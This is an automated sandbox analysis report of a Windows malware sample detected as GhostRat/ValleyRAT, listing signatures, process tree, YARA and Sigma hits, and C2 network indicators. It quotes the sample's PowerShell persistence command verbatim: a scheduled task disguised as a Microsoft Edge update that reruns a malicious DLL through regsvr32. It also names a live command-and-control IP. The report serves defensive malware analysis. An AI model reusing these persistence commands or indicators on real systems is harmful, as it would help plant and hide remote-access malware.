Edit tour

Windows Analysis Report
RXxeYma4d5.exe

Overview

General Information

Sample name:	RXxeYma4d5.exe renamed because original name is a hash value
Original sample name:	6496951be7839af7461c7988dd4d324f.exe
Analysis ID:	1582584
MD5:	6496951be7839af7461c7988dd4d324f
SHA1:	b0da6dacfdfafa38f4da8a6de97777a839ab36e4
SHA256:	32a8c77f35f4bd8fdd4afe2e5d37c9effeac2df4ba141a3ac611fee37447f68f
Tags:	exeValleyRATuser-abuse_ch
Infos:

Detection

GhostRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected GhostRat

AI detected suspicious sample

Contains functionality to capture and log keystrokes

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Found stalling execution ending in API Sleep call

Loading BitLocker PowerShell Module

Sets debug register (to hijack the execution of another thread)

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Suspicious powershell command line found

Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)

Uses Register-ScheduledTask to add task schedules

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Installs a global mouse hook

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

RXxeYma4d5.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\RXxeYma4d5.exe" MD5: 6496951BE7839AF7461C7988DD4D324F)

RXxeYma4d5.tmp (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp" /SL5="$10480,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe" MD5: D5A634439F2ABA0A8D26F31577C73343)

RXxeYma4d5.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT MD5: 6496951BE7839AF7461C7988DD4D324F)

RXxeYma4d5.tmp (PID: 7584 cmdline: "C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp" /SL5="$20484,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT MD5: D5A634439F2ABA0A8D26F31577C73343)

regsvr32.exe (PID: 7600 cmdline: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 7616 cmdline: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 7644 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7872 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 7256 cmdline: "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Cow.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 8020 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2926694272.0000000000C57000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x33638:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x36b6e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x22388:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x258be:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: regsvr32.exe PID: 7616	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.regsvr32.exe.c695bd.0.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2107b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x245b1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
5.2.regsvr32.exe.28b130d.1.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2107b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x245b1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7616, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7644, ProcessName: powershell.exe

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 23.235.165.54, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7616, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50004

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 23.235.165.54, DestinationIsIpv6: false, DestinationPort: 6666, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7616, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll, CommandLine: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp" /SL5="$20484,572569,203776,C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp, ParentProcessId: 7584, ParentProcessName: RXxeYma4d5.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll, ProcessId: 7600, ProcessName: regsvr32.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7616, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7644, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7616, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7644, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Anonymous RAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T23:12:22.238374+0100	2052875	1	A Network Trojan was detected	192.168.2.4	49736	23.235.165.54	6666	TCP
2024-12-30T23:13:30.811748+0100	2052875	1	A Network Trojan was detected	192.168.2.4	49737	23.235.165.54	6666	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Setup_Cow.dll (copy)	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\is-I9R0P.tmp	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: RXxeYma4d5.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_00007FFE013E0170 TlsGetValue,BCryptGenRandom,SystemFunction036,TlsGetValue,TlsGetValue,TlsSetValue,HeapFree,HeapFree,TlsSetValue,HeapFree,HeapFree,TlsSetValue,HeapFree,HeapFree,TlsSetValue,

5_2_00007FFE013E0170

Source: RXxeYma4d5.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File Manager_is1

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: [:	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E49960 GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,

5_2_02E49960

Source: C:\Windows\System32\regsvr32.exe

Code function: 4x nop then push r13

5_2_00007FFE01425514

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49736 -> 23.235.165.54:6666
Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49737 -> 23.235.165.54:6666

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 23.235.165.54 8888

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 23.235.165.54:6666

Source: Joe Sandbox View

ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS

Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54
Source: unknown	TCP traffic detected without corresponding DNS query: 23.235.165.54

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E43660 select,recv,_errno,_errno,_errno,

5_2_02E43660

Source: powershell.exe, 00000006.00000002.1756750432.000001F411485000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1728970401.000001F401638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.1728970401.000001F401411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.0000028233781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1728970401.000001F401638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RXxeYma4d5.exe, 00000000.00000003.1666133308.0000000002440000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.exe, 00000000.00000003.1666348689.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.tmp, 00000001.00000000.1666946979.0000000000401000.00000020.00000001.01000000.00000004.sdmp, RXxeYma4d5.tmp.2.dr, is-HU557.tmp.3.dr, RXxeYma4d5.tmp.0.dr	String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 00000006.00000002.1768623458.000001F47F95B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: RXxeYma4d5.exe, 00000000.00000003.1666133308.0000000002440000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.exe, 00000000.00000003.1666348689.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, RXxeYma4d5.tmp, 00000001.00000000.1666946979.0000000000401000.00000020.00000001.01000000.00000004.sdmp, RXxeYma4d5.tmp.2.dr, is-HU557.tmp.3.dr, RXxeYma4d5.tmp.0.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 00000006.00000002.1728970401.000001F401411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1804406305.0000028233781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1894153184.000002824BC80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RXxeYma4d5.tmp, 00000003.00000003.1675966181.0000000005B30000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmp, is-I9R0P.tmp.3.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1756750432.000001F411485000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1883487909.00000282437F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\System32\regsvr32.exe

Code function: [esc]

5_2_02E52000

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E52000 Sleep,GetTickCount,GetTickCount,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,GlobalUnlock,CloseClipboard,GetKeyState,lstrlenW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,

5_2_02E52000

Source: C:\Windows\System32\regsvr32.exe

5_2_02E52000

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E4EBE0 GetDesktopWindow,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,GetDIBits,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,

5_2_02E4EBE0

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E51BF0 SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,

5_2_02E51BF0

Source: C:\Windows\System32\regsvr32.exe

Windows user hook set: 0 mouse low level C:\Windows\system32\DINPUT8.dll

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.regsvr32.exe.c695bd.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 5.2.regsvr32.exe.28b130d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2926694272.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013ED4A0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	5_2_00007FFE013ED4A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D5D24 memset,HeapCreate,HeapAlloc,GetLastError,memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,HeapFree,HeapFree,GetModuleHandleA,GetProcAddress,HeapFree,HeapFree,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,DeleteFileW,HeapFree,GetLastError,HeapFree,HeapFree,RtlFreeHeap,NtGetContextThread,NtSetContextThread,NtClose,HeapFree,HeapFree,HeapFree,HeapFree,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,	5_2_00007FFE013D5D24
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_00007FFE013D6280 memset,HeapCreate,HeapAlloc,GetLastError,memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,HeapFree,HeapFree,GetModuleHandleA,GetProcAddress,HeapFree,HeapFree,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,HeapFree,RtlFreeHeap,NtGetContextThread,NtSetContextThread,NtClose,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,	5_2_00007FFE013D6280

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4E0E8 ExitWindowsEx,	5_2_02E4E0E8
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4E0C7 ExitWindowsEx,	5_2_02E4E0C7
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4E097 ExitProcess,ExitWindowsEx,	5_2_02E4E097

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4EBE0	5_2_02E4EBE0
